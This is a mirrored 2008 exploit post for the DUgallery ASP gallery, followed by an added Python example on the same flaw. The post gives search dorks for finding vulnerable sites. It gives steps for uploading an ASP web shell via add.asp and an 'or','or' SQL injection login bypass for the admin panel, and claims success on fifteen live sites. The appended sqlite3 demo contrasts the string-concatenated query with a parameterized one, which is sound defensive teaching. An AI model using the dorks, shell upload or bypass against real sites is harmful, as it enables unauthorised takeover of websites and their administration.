Computer Security
[EN] securityvulns.ru
From:Alemin_Krali Krali <alemin_(at)_windowslive.com>
Date:20.09.2008
Subject:DUgallery - ALL VERSIONS (Upload/SQL/) Multiple Remote Vulnerabilities


###################################################################

# DUgallery - ALL VERSIONS!

# Discovered by : Alemin_Krali

# my blog: al3m.blogspot.com  

# inurl:pic.asp?iCat=  
   
       
# inurl:cat.asp?iCat=

#-# 1-Upload Bug [HIGH!!! %75 success] new!

1-Open Firefox
2-Tools > Options > Content > JavaScript not active! Save and reopen Firefox.

http://[site.com]/path/add.asp ==>>> upload your Asp shell

http://[site.com]/path/pictures/yourshell.asp ==>>> your address

#-# 2-SQL INJECTION  ? [HIGH!!! %95 success]

Tried 15 sites, result 15/15 :)

site.com/path/admin_default.asp

'a

Syntax error (missing operator) in query expression 'U_ID=''a' AND U_PASSWORD='''.

USERNAME:'or','or'
PASSWORD:

and submit! Welcome to the admin panel (:

###################################################################
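
Added example, not part of the original post and not DUgallery code: the error message quoted above shows the login query is built by concatenating form input into `U_ID='...' AND U_PASSWORD='...'`. The Python/sqlite3 sketch below rebuilds that query shape next to a parameterized version; the table name `USERS`, the sample rows and all function names are assumptions made for the illustration.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the application's user table (constructed data)."""
    db = sqlite3.connect(":memory:")
    # Column names come from the quoted error message; the table name is assumed.
    # Plaintext passwords only mirror the query in the post; store salted hashes in practice.
    db.execute("CREATE TABLE USERS (U_ID TEXT, U_PASSWORD TEXT)")
    db.executemany("INSERT INTO USERS VALUES (?, ?)",
                   [("admin", "constructed-password"), ("o'neil", "constructed-pw2")])
    return db

def concatenated_where(u_id, password):
    """WHERE clause built the way the error message implies: input becomes SQL text."""
    return "U_ID='" + u_id + "' AND U_PASSWORD='" + password + "'"

def login_concatenated(db, u_id, password):
    """'Before' version. Returns True/False, or "syntax error" when the input
    changed the structure of the statement instead of being treated as a value."""
    try:
        sql = "SELECT 1 FROM USERS WHERE " + concatenated_where(u_id, password)
        return db.execute(sql).fetchone() is not None
    except sqlite3.OperationalError:
        return "syntax error"

def login_parameterized(db, u_id, password):
    """Hardened version: values are bound as parameters and never parsed as SQL."""
    sql = "SELECT 1 FROM USERS WHERE U_ID = ? AND U_PASSWORD = ?"
    return db.execute(sql, (u_id, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    # The probe value from the post reproduces the expression in the error message.
    print(concatenated_where("'a", ""))
    print(login_concatenated(db, "'a", ""))     # query structure broken by the quote
    print(login_parameterized(db, "'a", ""))    # treated as data: no such user
    # A legitimate user name containing an apostrophe only works when bound.
    print(login_concatenated(db, "o'neil", "constructed-pw2"))
    print(login_parameterized(db, "o'neil", "constructed-pw2"))
```

A database syntax error returned to the browser from a login form, as in the post, is itself a useful signal to alert on in web server and application logs.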

